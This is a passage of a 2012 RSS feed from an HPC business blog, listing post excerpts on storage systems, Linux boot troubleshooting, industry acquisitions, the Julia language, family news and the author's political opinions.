      <link>https://blog.scalability.org/2012/08/ot-canton-mi-olympian-and-an-olympian-hopeful/</link>
      <pubDate>Wed, 15 Aug 2012 01:51:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/08/ot-canton-mi-olympian-and-an-olympian-hopeful/</guid>
      <description>Took off work early to take family (and Captain!) to see Allison Schmitt at Canton&amp;rsquo;s Heritage Park. For those who don&amp;rsquo;t know, Allison won 3 gold medals, a silver, and a bronze at the 2012 Olympics in London. We watched 2 of her races, most of Ryan Lochte&amp;rsquo;s, Michael Phelps, and as many of the swimming contests as NBC broadcast (sadly not enough). My wife and I enjoyed the races, and, as it turns out, so did my daughter.</description>
    </item>
    
    <item>
      <title>As a service: the rapidly changing face of HPC</title>
      <link>https://blog.scalability.org/2012/08/as-a-service-the-rapidly-changing-face-of-hpc/</link>
      <pubDate>Mon, 13 Aug 2012 19:24:12 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/08/as-a-service-the-rapidly-changing-face-of-hpc/</guid>
      <description>Our market is often inundated with buzzwords. And fads sweep through organizations looking for silver bullets to their very hard problems. Some of these problems are self-inflicted &amp;hellip; some are as a result of growth, or needed infrastructure change. One of the biggest problems with HPC (and to a degree, storage) has been the high up-front costs to build what you need. You have to lay down capital to buy something, which may or may not have an ROI adequate to pay for it.</description>
    </item>
    
    <item>
      <title>OT:  Welcome to the newest member of our family</title>
      <link>https://blog.scalability.org/2012/08/ot-welcome-to-the-newest-member-of-our-family/</link>
      <pubDate>Mon, 13 Aug 2012 03:19:27 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/08/ot-welcome-to-the-newest-member-of-our-family/</guid>
      <description>Captain is a rescue dog from the CHAINED Inc. organization. He is the dog on the right at 1:21. His sister is the dog on the left of that frame.
[ ](/images/captain.jpg)
Captain is a 9 month old or so yellow lab. He was badly abused. He has major trust issues, and I don&amp;rsquo;t blame him for this. It will take time to learn to trust. He&amp;rsquo;s been with us 5 days now, and loves my wife and daughter.</description>
    </item>
    
    <item>
      <title>Beautiful smackdown</title>
      <link>https://blog.scalability.org/2012/08/beautiful-smackdown/</link>
      <pubDate>Thu, 09 Aug 2012 20:23:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/08/beautiful-smackdown/</guid>
      <description>This is epic. As originally seen on @mndoci &amp;rsquo;s twitter stream. Short version: Those who don&amp;rsquo;t have a clue, really &amp;hellip; REALLY &amp;hellip; shouldn&amp;rsquo;t write lengthy journal articles about what they don&amp;rsquo;t have a clue about. Lest they get smacked down. Like this. For some reason, its an article of faith for many people, who largely do not understand why, that the big drug companies are EEEEVVIIIILLL (hope I used enough I&amp;rsquo;s there).</description>
    </item>
    
    <item>
      <title>Whats old is new again</title>
      <link>https://blog.scalability.org/2012/08/whats-old-is-new-again/</link>
      <pubDate>Thu, 09 Aug 2012 02:36:49 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/08/whats-old-is-new-again/</guid>
      <description>Inspired by this article. Back in the dim and distant past, when I started graduate school &amp;hellip; no before that &amp;hellip; I had something of an &amp;hellip; naive &amp;hellip; world and economic view. This view had me believing that newly minted physics Ph.D. types would be able to find a nice tenure track relatively easily after a short postdoc. From there to professional career bliss. Do research, write grants, publish, teach.</description>
    </item>
    
    <item>
      <title>Cool hack attempt ...</title>
      <link>https://blog.scalability.org/2012/08/cool-hack-attempt/</link>
      <pubDate>Mon, 06 Aug 2012 20:54:24 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/08/cool-hack-attempt/</guid>
      <description>This one was actually much harder to discern that it was a hack attempt until I looked at the payload in an editor. Never EVER under any circumstances read HTML mail from a source you don&amp;rsquo;t trust &amp;hellip; and I am getting ready to say, from anyone. Here is a portion of the payload: `</description>
    </item>
    
    <item>
      <title>So much #fail in the RHEL init process</title>
      <link>https://blog.scalability.org/2012/08/so-much-fail-in-the-rhel-init-process/</link>
      <pubDate>Fri, 03 Aug 2012 20:55:09 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/08/so-much-fail-in-the-rhel-init-process/</guid>
      <description>Its borked so incredibly badly, that in order to support what we need, we have to hack around all its brokenness. Dracut is a step up, but pretty much everything else (and this may be a dracut issue) is borked. We want one initramfs to support software RAID1 boot, network boot, iscsi boot. But you have to pull in so many modules to get this to work &amp;hellip; we have gigantic initramfs that take forever to assemble.</description>
    </item>
    
    <item>
      <title>We built that:  10 years in business</title>
      <link>https://blog.scalability.org/2012/08/we-built-that-10-years-in-buiness/</link>
      <pubDate>Thu, 02 Aug 2012 02:24:44 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/08/we-built-that-10-years-in-buiness/</guid>
      <description>[warning: longer post] I mentioned this on twitter (@sijoe). The day job has been in business for 10 years. We&amp;rsquo;ve not taken outside investment to date, and we&amp;rsquo;ve not sold the company yet. We&amp;rsquo;ve been profitable and growing continuously during our lifetime. The preceding 3 years have seen growth, accelerating hard. The company was built starting with a conviction that practitioners and users of HPC systems needed better designs, better systems than were being pushed out by traditional vendors in the early 2000&amp;rsquo;s.</description>
    </item>
    
    <item>
      <title>the mystery of the week</title>
      <link>https://blog.scalability.org/2012/08/the-mystery-of-the-week/</link>
      <pubDate>Wed, 01 Aug 2012 05:31:24 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/08/the-mystery-of-the-week/</guid>
      <description>Customer has had a machine for a while. Generally stable. Followed our advice on doing a reboot recently. Unit started crashing Monday. Then today. Hard to stay up and stable. I asked if anything has changed, and haven&amp;rsquo;t gotten anything conclusive &amp;hellip; mostly &amp;ldquo;we don&amp;rsquo;t think so&amp;rdquo;. About the crashes: Nothing in the logs. Not a thing. No hardware subsystem, which has logging enabled (RAID, motherboard, PCIe, IPMI, &amp;hellip; ) reports an error.</description>
    </item>
    
    <item>
      <title>... and Oracle snarfs up Xsigo ...</title>
      <link>https://blog.scalability.org/2012/07/and-oracle-snarfs-up-xsigo/</link>
      <pubDate>Tue, 31 Jul 2012 16:26:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/07/and-oracle-snarfs-up-xsigo/</guid>
      <description>Xsigo makes virtual network connectivity systems. Basically letting you build a virtual network, in a software stack, so you can avoid spending so much money on a fixed (and inflexible) network stack. Its a neat concept, but its utility is focused elsewhere than HPC. Even though they talk storage, I&amp;rsquo;d argue its a fairly expensive way to build a network for storage as well &amp;hellip; though if you are going to be changing your network all the time, it actually might be a win.</description>
    </item>
    
    <item>
      <title>... and he&#39;s back!</title>
      <link>https://blog.scalability.org/2012/07/and-hes-back/</link>
      <pubDate>Mon, 30 Jul 2012 15:15:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/07/and-hes-back/</guid>
      <description>with a good article on a new license formulated for genomic code being distributed by a university research center. Glad to see the blog back up! Or rebooted &amp;hellip; and +10 on your article. It (that license) is the wrong direction IMO. Goes against what publicly funded scientific code should be distributed as (IMO).</description>
    </item>
    
    <item>
      <title>More M&amp;A?</title>
      <link>https://blog.scalability.org/2012/07/more-ma/</link>
      <pubDate>Sun, 29 Jul 2012 04:05:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/07/more-ma/</guid>
      <description>I&amp;rsquo;ve heard OCZ being looked at by Seagate and others. That would make sense. Honestly I think my expectations are not that companies have fire sales going on &amp;hellip; but that areas where some sort of force multiplication is possible &amp;hellip; these companies will be snapped up to help grow larger companies. Acquirers are after a few things. Value in terms of market, products, people, technology and capability, fit, etc. I do expect to see a few fire sales, but not many.</description>
    </item>
    
    <item>
      <title>A question a customer asked relative to Lustre and the Whamcloud acquisition</title>
      <link>https://blog.scalability.org/2012/07/a-question-a-customer-asked-relative-to-lustre-and-the-whamcloud-acquisition/</link>
      <pubDate>Sun, 29 Jul 2012 03:41:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/07/a-question-a-customer-asked-relative-to-lustre-and-the-whamcloud-acquisition/</guid>
      <description>Whats to become of Chroma (from Whamcloud)? I know its early, and I am sure that there won&amp;rsquo;t be answers just yet. Intel acquired Cilk, and its now available (and being integrated into gcc!) Intel acquired many others, and their bits are available. I&amp;rsquo;d expect Chroma to be made into an offering from Intel, along the lines of their cluster suite. Fully integrated stack. I know some folks are nervous about the acquisition.</description>
    </item>
    
    <item>
      <title>Some kernels don&#39;t like having non-assemble-able software RAIDs</title>
      <link>https://blog.scalability.org/2012/07/some-kernels-dont-like-having-non-assemble-able-software-raids/</link>
      <pubDate>Sun, 29 Jul 2012 03:00:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/07/some-kernels-dont-like-having-non-assemble-able-software-raids/</guid>
      <description>This one took me a while to figure out. I had to start probing why a system would crash the MD stack shortly after booting, but not in single user mode. So I started delving into the RAID. And found that the folks who set this unit up had a RAID0 with 0.90 metadata on the devices, and then 1.2 metadata on the MDS. So along comes the Lustre-ized kernel, and whammo.</description>
    </item>
    
    <item>
      <title>ahh grub 0.97 &#43; ext4 ... how I loathe thee</title>
      <link>https://blog.scalability.org/2012/07/ahh-grub-0-97-ext4-how-i-loathe-thee/</link>
      <pubDate>Fri, 27 Jul 2012 03:25:14 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/07/ahh-grub-0-97-ext4-how-i-loathe-thee/</guid>
      <description>I had forgotten that some combinations of grub + file system could be rendered unbootable without lots of additional help. Grub is annoying. This is Grub legacy. Grub current tries to fix the mess, but fails as it is overly complex. And it appears to omit PXE and network boot options. Well iPXE helps us there. This is why we like tiburon so much. No installation. No problem. No grub to worry about.</description>
    </item>
    
    <item>
      <title>bad design &#43; bad implementation = company success ???  Seriously ???</title>
      <link>https://blog.scalability.org/2012/07/bad-design-bad-implementation-company-success-seriously/</link>
      <pubDate>Fri, 27 Jul 2012 03:05:34 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/07/bad-design-bad-implementation-company-success-seriously/</guid>
      <description>We are often hired to work on existing systems, to see if we can help make them faster and better. I am working on such a project now, but this post is not about this project. I&amp;rsquo;ve noticed a tendency in the market to shoehorn a set of designs for storage/computing systems into areas they weren&amp;rsquo;t designed for. Moreover, these designs would be right at home 15 years ago, since then, far better scale out designs have come along which do a far better job than the older designs.</description>
    </item>
    
    <item>
      <title>hits bottom, digs deeper</title>
      <link>https://blog.scalability.org/2012/07/hits-bottom-keeps-digging/</link>
      <pubDate>Thu, 26 Jul 2012 23:52:33 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/07/hits-bottom-keeps-digging/</guid>
      <description>[update] below the fold and video. I can only conclude at this point that the &amp;ldquo;don&amp;rsquo;t get it&amp;rdquo; disease runs deep and wide in this administration. [update 2] This at the WSJ encapsulates what we are observing. This has gone beyond painful to watch to embarrassing. The president now claims that his statements were sliced and diced. He now is saying that he believes that businesses built themselves, while claiming that his earlier statement was taken out of context.</description>
    </item>
    
    <item>
      <title>why do people double down when they are wrong?</title>
      <link>https://blog.scalability.org/2012/07/why-do-people-double-down-when-they-are-wrong/</link>
      <pubDate>Wed, 25 Jul 2012 04:12:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/07/why-do-people-double-down-when-they-are-wrong/</guid>
      <description>And do it again,
&amp;hellip; sooooo &amp;hellip;. a public works project (bridge, dam, &amp;hellip;) is equivalent in his eyes to &amp;hellip;. a risk an entrepreneur takes? Seriously?
Erp &amp;hellip;. its glaringly obvious whom does not have an understanding. The worker in the private sector, punches the clock BECAUSE somewhere, somewhen, the entrepreneur had the idea, took the risk, entirely upon themselves, and built something. The &amp;ldquo;public sector&amp;rdquo; is a cost, something to be kept as small as possible so as not to drive those paying the public sectors bills, into the poor house.</description>
    </item>
    
    <item>
      <title>How I&#39;d like politicians to view entrepreneurs</title>
      <link>https://blog.scalability.org/2012/07/how-id-like-politicians-to-view-entrepreneurs/</link>
      <pubDate>Mon, 23 Jul 2012 14:38:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/07/how-id-like-politicians-to-view-entrepreneurs/</guid>
      <description>Wonderful post by Jim Pethokoukis, covering a talk made by Ronald Reagan years ago.
and
I will freely admit that I was (almost) completely wrong in my original impressions of Reagan. I had a different political outlook in those days, and I had trouble viewing the guy as getting it. But get it, he did. This change in perception comes mostly from a maturing and a rethinking of my own world view.</description>
    </item>
    
    <item>
      <title>Putting 2 and 2 together, hopefully getting 4</title>
      <link>https://blog.scalability.org/2012/07/putting-2-and-2-together-hopefully-getting-4/</link>
      <pubDate>Mon, 23 Jul 2012 01:00:28 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/07/putting-2-and-2-together-hopefully-getting-4/</guid>
      <description>I&amp;rsquo;ve been long bothered by serious people espousing ideas not well correlated with reality, as representing reality, and telling us not to believe our lying eyes or instruments. This is in a context of (catastrophic) AGW (call this CAGW). I don&amp;rsquo;t have any dogs in that race, nor in fracking, which uses hydrological mechanisms to extract hydrocarbon fuel precursors from underground reservoirs. I am very interested in sound science, and sound policy derived from either sound science, or as close to intelligently constructed policy as we can make.</description>
    </item>
    
    <item>
      <title>... and now the cartoons ...</title>
      <link>https://blog.scalability.org/2012/07/and-now-the-cartoons/</link>
      <pubDate>Sun, 22 Jul 2012 17:29:53 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/07/and-now-the-cartoons/</guid>
      <description>below the fold. Snarfed from many places on the net. Copyrights are owned by their respective owners. I don&amp;rsquo;t know all the correct attributions, so if you find/know of it, please let me know so I can correctly update the list.
The few remaining defenders of this failed statement and meme are all parroting seemingly, the exact same talking points. Now why would that be? Most everyone else, regardless of political affiliation realizes what a complete mess this has become &amp;hellip; well &amp;hellip; those outside of the media.</description>
    </item>
    
    <item>
      <title>OT: things taken for granted, and relearned</title>
      <link>https://blog.scalability.org/2012/07/ot-things-taken-for-granted-and-relearned/</link>
      <pubDate>Sun, 22 Jul 2012 12:59:29 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/07/ot-things-taken-for-granted-and-relearned/</guid>
      <description>Sleep is the great rejuvinator. When you get good sleep, you feel generally much better when you wake up. Your body does repair functions, your brain works out (some issues). And occasionally you dream. Going without sleep ages people, makes them less productive as they are more tired during the day. It limits the repair functionality. It hinders the &amp;ldquo;work through problems&amp;rdquo;. It prevents dreams. Pulling all-nighters is one instance of doing without sleep.</description>
    </item>
    
    <item>
      <title>Insanely funny comedic response to &#34;you didn&#39;t build that&#34;</title>
      <link>https://blog.scalability.org/2012/07/insanely-funny-comedic-response-to-you-didnt-build-that/</link>
      <pubDate>Sun, 22 Jul 2012 00:45:48 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/07/insanely-funny-comedic-response-to-you-didnt-build-that/</guid>
      <description>This past week saw the president of the US in another major screw up &amp;hellip; one he doesn&amp;rsquo;t quite understand why its a screw up &amp;hellip; and many of his supporters don&amp;rsquo;t quite seem to get it either. The responses to the screw up have been coming fast and furious. This has become a major issue of the campaign now, about &amp;ldquo;getting it&amp;rdquo;. Its as defining as &amp;ldquo;its the economy stupid&amp;rdquo;, and specifically as to what the economy is.</description>
    </item>
    
    <item>
      <title>Economic headwinds being reported</title>
      <link>https://blog.scalability.org/2012/07/economic-headwinds-being-reported/</link>
      <pubDate>Sun, 22 Jul 2012 00:05:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/07/economic-headwinds-being-reported/</guid>
      <description>HPC is a small fraction of the total computing market. The market in general experience forces from the state of the economy &amp;hellip; in growing economic times, generally large portions of the computing market are refreshing and updating gear. Conversely, when we are treading water, or contracting as an economy, word from on high in IT organizations is usually &amp;ldquo;make do with what you have&amp;rdquo; for a while. Many industries and economists have noted signs portending a downturn over the past few months.</description>
    </item>
    
    <item>
      <title>SSaaS ... huh... what?</title>
      <link>https://blog.scalability.org/2012/07/ssaas-huh-what/</link>
      <pubDate>Thu, 19 Jul 2012 18:49:35 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/07/ssaas-huh-what/</guid>
      <description>On James Cuff&amp;rsquo;s blog, a nice post about utilization of software. In it he writes:
to which I say &amp;hellip;
Human Voice Clip Female Young Woman Exclamations Oh Man
Seriously &amp;hellip; I gave up on the indentation as a form of program structure when I stopped doing much Fortran. Sheesh. Whats next &amp;hellip; everyone using BASIC, with a little OO wrapper, a JIT, and an LLVM backend to run on GPUs (with a VHDL conversion tool)?</description>
    </item>
    
    <item>
      <title>Seriously enjoying playing with the Julia language</title>
      <link>https://blog.scalability.org/2012/07/seriously-enjoying-playing-with-the-julia-language/</link>
      <pubDate>Thu, 19 Jul 2012 18:08:52 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/07/seriously-enjoying-playing-with-the-julia-language/</guid>
      <description>See here. Parallel and distributed computing, not as an afterthought, but reasonably well integrated. Even better would be loops and vector ops which handled parallelism completely transparently &amp;hellip; which &amp;hellip; they effectively do in some cases. Waiting on static compilers, this language uses LLVM backend. There&amp;rsquo;s even a hook to generate code for PTX targets. No more separate language needed for GPU. Just run your code and it takes advantage of computational resources, regardless of the asymmetric nature.</description>
    </item>
    
    <item>
      <title>Gaak ... this is why we like tiburon</title>
      <link>https://blog.scalability.org/2012/07/gaak-this-is-why-we-like-tiburon/</link>
      <pubDate>Thu, 19 Jul 2012 17:59:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/07/gaak-this-is-why-we-like-tiburon/</guid>
      <description>Finishing up building an testing system for Ceph for a customer. Unfortunately, due to another technical issue, we couldn&amp;rsquo;t simply encode the config in tiburon finishing scripts. The technical issue is the use of the current tiburon master system by another project, and we don&amp;rsquo;t have another spare system to build a mirror of it (going to change this soon), we are stuck using an older more rudimentary version of the system.</description>
    </item>
    
    <item>
      <title>GlusterFS and RDMA support</title>
      <link>https://blog.scalability.org/2012/07/glusterfs-and-rdma-support/</link>
      <pubDate>Mon, 16 Jul 2012 19:40:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/07/glusterfs-and-rdma-support/</guid>
      <description>[update] In 3.3.1/3.3.2 This appeared in the 3.3.0 docs. &amp;ldquo;NOTE: with 3.3.0 release, transport type &amp;lsquo;rdma&amp;rsquo; and &amp;lsquo;tcp,rdma&amp;rsquo; are not fully supported.&amp;rdquo; On page 133 of the Admin Guide. We&amp;rsquo;ve been noting breakage with support since the 3.0.x days. I think there were varying factions within the company that wanted pure tcp, and some wanted RDMA included. The latter is what HPC folks use for their storage. GlusterFS is going in a decidedly non-HPC direction, which is fine.</description>
    </item>
    
    <item>
      <title>9 years and 351 days</title>
      <link>https://blog.scalability.org/2012/07/9-years-and-354-days/</link>
      <pubDate>Mon, 16 Jul 2012 17:07:55 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/07/9-years-and-354-days/</guid>
      <description>[updated to get the count right] Thats how long the day job has been in business. Our 10 year anniversary is 1-August. I started this business 10 years ago, in part to scratch an itch, but really because I believed strongly in the HPC market. I still do, though our view of the market has evolved, and we look on how its been evolving with mixtures of joy and trepidation. Trepidation in part because we&amp;rsquo;ve been pretty good at predicting what comes next, and sadly not been able to raise the capital needed to build in that area (at least previously).</description>
    </item>
    
    <item>
      <title>Why business models for HPC are so very important</title>
      <link>https://blog.scalability.org/2012/07/why-business-models-for-hpc-are-so-very-important/</link>
      <pubDate>Sun, 15 Jul 2012 21:21:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/07/why-business-models-for-hpc-are-so-very-important/</guid>
      <description>You need a sound business model. Not a sound business plan, but a concept of where revenue comes in, and how you will profit from it, and what your costs are, before you should build and sell a product. In the case of state sponsored infrastructure, any model that looks like this:
 1. Build it 2. ??? 3. Profit!  is a failure waiting to happen. Its not a business model.</description>
    </item>
    
    <item>
      <title>OT:  I want to comment on this ...</title>
      <link>https://blog.scalability.org/2012/07/ot-i-want-to-comment-on-this/</link>
      <pubDate>Sun, 15 Jul 2012 20:04:48 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/07/ot-i-want-to-comment-on-this/</guid>
      <description>[update] Good for them, the NFIB hits back, hard. No mental gymanstics required to correctly interpret what was said. Further they back it up with almost identical quotes from Elisabeth Warren herself, who appears to be the originator of this epic failure of a meme. This entire meme deserves all the derision being heaped on it. [update 2] And the pile on begins in earnest. James Pethokoukis (economics blogger and many other things) has some good comments of his own, as well as from others.</description>
    </item>
    
    <item>
      <title>huge dependency radii, or why I stopped using Catalyst</title>
      <link>https://blog.scalability.org/2012/07/huge-dependency-radii-or-why-i-stopped-using-catalyst/</link>
      <pubDate>Sun, 15 Jul 2012 03:04:33 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/07/huge-dependency-radii-or-why-i-stopped-using-catalyst/</guid>
      <description>More than a year ago, we were working on (re)developing some code for UI for our units. Original UI code had been in Catalyst framework, an MVC system for Perl. I like Perl, it makes rapid application development easy, and reasonably painless. CPAN makes avoiding coding things yourself pretty easy. Short side trip. A dependency radius is the measure of the number of additional things unrelated to your source code itself, required to build or operate your program.</description>
    </item>
    
    <item>
      <title>... and Whamcloud is snarfed up by Intel ...</title>
      <link>https://blog.scalability.org/2012/07/and-whamcloud-is-snarfed-up-by-intel/</link>
      <pubDate>Fri, 13 Jul 2012 22:30:11 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/07/and-whamcloud-is-snarfed-up-by-intel/</guid>
      <description>See here
First off, congratulations to Brent, Eric, and everyone at Whamcloud. I had thought that the BI/Big Data side of things could prove interesting for them, and might make them in play. I hadn&amp;rsquo;t realized how quickly this was the case. Second, Big Data is huge. Lustre, which is effectively Whamcloud&amp;rsquo;s product (ignoring IP ownership, yadda yadda &amp;hellip;), can play there, though it needs some serious additional work. But with the acquisition, I&amp;rsquo;d argue that the multithreading MDS and ODS are not far off.</description>
    </item>
    
    <item>
      <title>OT:  Just brilliant</title>
      <link>https://blog.scalability.org/2012/07/ot-just-brilliant/</link>
      <pubDate>Sat, 07 Jul 2012 04:20:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/07/ot-just-brilliant/</guid>
      <description>Been a thunderbird email client since 2004. Dropped Evolution in favor of thunderbird, it just worked, everywhere, the same. Around 2009-2010 time period, Mozilla decided to refocus thunderbird. Pull resources from it. This didn&amp;rsquo;t work out well, as users protested rather intensely. Looks like they are about to do it again, specifically to start chasing the mobile market. This letter on pastebin &amp;hellip; and the priceless commentary afterwords, yeah &amp;hellip; says it all.</description>
    </item>
    
    <item>
      <title>Just configured a new generation storage unit ...</title>
      <link>https://blog.scalability.org/2012/07/just-configured-a-new-generation-storage-unit/</link>
      <pubDate>Fri, 06 Jul 2012 16:29:33 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/07/just-configured-a-new-generation-storage-unit/</guid>
      <description>4U, 256TB raw, fire breathing monsterously fast unit. Our existing 5U units already leave competitors single units, never mind their storage clusters, deep in the dust, and falling rapidly behind. Next gen isn&amp;rsquo;t incremental change. Its big. Huge even. Density and performance that boggles my mind, and we&amp;rsquo;ve set some pretty serious records for performance (5.6 GB/s read, 4.5 GB/s write for spinning disk) with the existing kit. And you will see these very soon.</description>
    </item>
    
    <item>
      <title>Presenting the Higgs boson</title>
      <link>https://blog.scalability.org/2012/07/presenting-the-higgs-boson/</link>
      <pubDate>Thu, 05 Jul 2012 03:51:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/07/presenting-the-higgs-boson/</guid>
      <description>Reuters has an article on it here. Not my area of work from a while ago, but I had a few friends (postdocs, etc.) working on it (in a theoretical sense). One quit high energy physics to work on the &amp;ldquo;muck left over after the big bang&amp;rdquo;. The latter is where the money and jobs are, the former is for those who get lucky and find an academic home. I find it funny how reporters tend to paint groups with broad strokes.</description>
    </item>
    
    <item>
      <title>What to think about cloud outages</title>
      <link>https://blog.scalability.org/2012/06/what-to-think-about-cloud-outages/</link>
      <pubDate>Sat, 30 Jun 2012 15:55:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/06/what-to-think-about-cloud-outages/</guid>
      <description>EC2 wwas taken down by the storms running across the US. Parts of EC2 were anyway. And it took down Netflix and others. Hmmmm. We put our web and mail into EC2 specifically to avoid these sorts of problems. While we are working on getting our second line up on a different technology from our primary, we are leaving it in the cloud. As I&amp;rsquo;ve said many times &amp;hellip;. There ain&amp;rsquo;t no such thing as a silver bullet or a free lunch.</description>
    </item>
    
    <item>
      <title>OT: my reading list ...</title>
      <link>https://blog.scalability.org/2012/06/ot-my-reading-list/</link>
      <pubDate>Sat, 30 Jun 2012 03:54:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/06/ot-my-reading-list/</guid>
      <description>So I am off on a vacation tomorrow. Normally for our summer forays, I grab Gardner Dozius compendium called The Years Best Science Fiction. I have from year 14 to the current (year 28). Its just not summer without it. Well, its not out yet. Will be out on 3-July. Oh well&amp;hellip; Ok &amp;hellip; I also grab everything by Charles Stross that I have not read from the preceding year. Hey, he&amp;rsquo;s got a new Laundry book coming out!</description>
    </item>
    
    <item>
      <title>OT:  Off to a nice &#34;relaxing&#34; vacation tomorrow</title>
      <link>https://blog.scalability.org/2012/06/ot-off-to-a-nice-relaxing-vacation-tomorrow/</link>
      <pubDate>Sat, 30 Jun 2012 03:43:34 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/06/ot-off-to-a-nice-relaxing-vacation-tomorrow/</guid>
      <description>Long overdue. We&amp;rsquo;ve had a &amp;hellip; challenging &amp;hellip; year, starting some family health issues, and my working from home for the first 6 weeks of the year. Company had to make an adjustment after we realized that there was an poor matching of capabilities, motivation, and goals for a portion of our team. All this contributed to increasing my level of stress. So I am happy to report that we are hopping into a car (minivan really), and making the trek to Orlando, by way of Atlanta.</description>
    </item>
    
    <item>
      <title>[updated] Lumps ...</title>
      <link>https://blog.scalability.org/2012/06/yes-i-really-like-it-when-we-take-lumps-for-supplier-snafus/</link>
      <pubDate>Mon, 25 Jun 2012 22:24:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/06/yes-i-really-like-it-when-we-take-lumps-for-supplier-snafus/</guid>
      <description>[Update] Not all of the issues were with the supplier. I started investigating and found out that we deserved some of the lumps. Me in particular for not paying more attention to the situation as it evolved. I made the assumption that someone else was covering it, and I didn&amp;rsquo;t need to. As I&amp;rsquo;ve discovered, this was a mistake on my part. The story is more annoying than I allude to here.</description>
    </item>
    
    <item>
      <title>(nearly) a Gigaflop at your side</title>
      <link>https://blog.scalability.org/2012/06/nearly-a-gigaflop-at-your-side/</link>
      <pubDate>Wed, 20 Jun 2012 13:26:23 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/06/nearly-a-gigaflop-at-your-side/</guid>
      <description>First impression: this is so wrong &amp;hellip; so &amp;hellip; very wrong &amp;hellip; Second impression: well, mebbe not.
[ ](http://hothardware.com/Reviews/Samsung-Galaxy-S-III-Review/?page=5)
Seriously though, this is a natural evolution of a public &amp;ldquo;flash&amp;rdquo; cloud. This is 1/5 of a gigaflop, which as a grad student 22+ years ago, I would have sacrificed for. I don&amp;rsquo;t think it will be too long before we are seeing multi-GFLOP on our hips. In which case, apart from network latency and storage bandwidth and size &amp;hellip; you&amp;rsquo;ve got a seething mobile computing platform out there with a huge aggregate capability.</description>
    </item>
    
    <item>
      <title>Security and legal implications of the data bandwidth wall</title>
      <link>https://blog.scalability.org/2012/06/security-and-legal-implications-of-the-data-bandwidth-wall/</link>
      <pubDate>Wed, 20 Jun 2012 03:54:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/06/security-and-legal-implications-of-the-data-bandwidth-wall/</guid>
      <description>Again, hat tip to Alastair who pointed me at this article. At the most basic level, there are real costs, and real consequences to not being able to act nimbly, and leverage the bandwidth you need to perform the operations you require to successfully perform your job functions. These consequences could have some significant implications for legal cases. Or for terror threats. What if you have a trove of data, that you have to act quickly upon?</description>
    </item>
    
    <item>
      <title>Security and legal implications of the data bandwidth wall, part 0</title>
      <link>https://blog.scalability.org/2012/06/security-and-legal-implications-of-the-data-bandwidth-wall-part-0/</link>
      <pubDate>Sun, 17 Jun 2012 14:44:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/06/security-and-legal-implications-of-the-data-bandwidth-wall-part-0/</guid>
      <description>Had a link sent in (hat tip to Alastair) with a story that perfectly illustrates the data bandwidth wall, our ability to act in a legal manner with respect to it. There are broader implications, and &amp;hellip; to us &amp;hellip; something of a surprising connection to the company. And a serious indictment of the current US government procurement process. This story has EPIC FAILURE (for the US government) written all over it, for multiple reasons.</description>
    </item>
    
    <item>
      <title>Bad decisions in retrospect</title>
      <link>https://blog.scalability.org/2012/06/bad-decisions-in-retrospect/</link>
      <pubDate>Wed, 13 Jun 2012 18:02:59 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/06/bad-decisions-in-retrospect/</guid>
      <description>We&amp;rsquo;ve made one in particular, that is causing me to (seriously) regret our choice. We use wiki software for our documentation and internal site(s). We had chosen dekiwiki as our platform, based upon our perceived need for ease of use, access control, and other issues. First Wiki went up fine. This was an internal wiki for knowledge capture. Second wiki came up fine, for documentation. I like living documentation we can annotate.</description>
    </item>
    
    <item>
      <title>Is flash a flash in the pan?</title>
      <link>https://blog.scalability.org/2012/06/is-flash-a-flash-in-the-pan/</link>
      <pubDate>Wed, 13 Jun 2012 03:40:44 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/06/is-flash-a-flash-in-the-pan/</guid>
      <description>This article makes a case that it is. As with many articles about X dying, its worth asking if their argument makes sense. Basically the point they are making boils down to density, resiliency, and other aspects. Specifically they point out that the fundamental flash design is inherently flawed &amp;hellip; it self destructs after a while &amp;hellip; wears out. So their argument begins, the denser the bits per cell, the fewer write cycles before the cell is unusable.</description>
    </item>
    
    <item>
      <title>OT:  Wishing for more competition in cellular phones ...</title>
      <link>https://blog.scalability.org/2012/06/ot-wishing-for-more-competition-in-cellular-phones/</link>
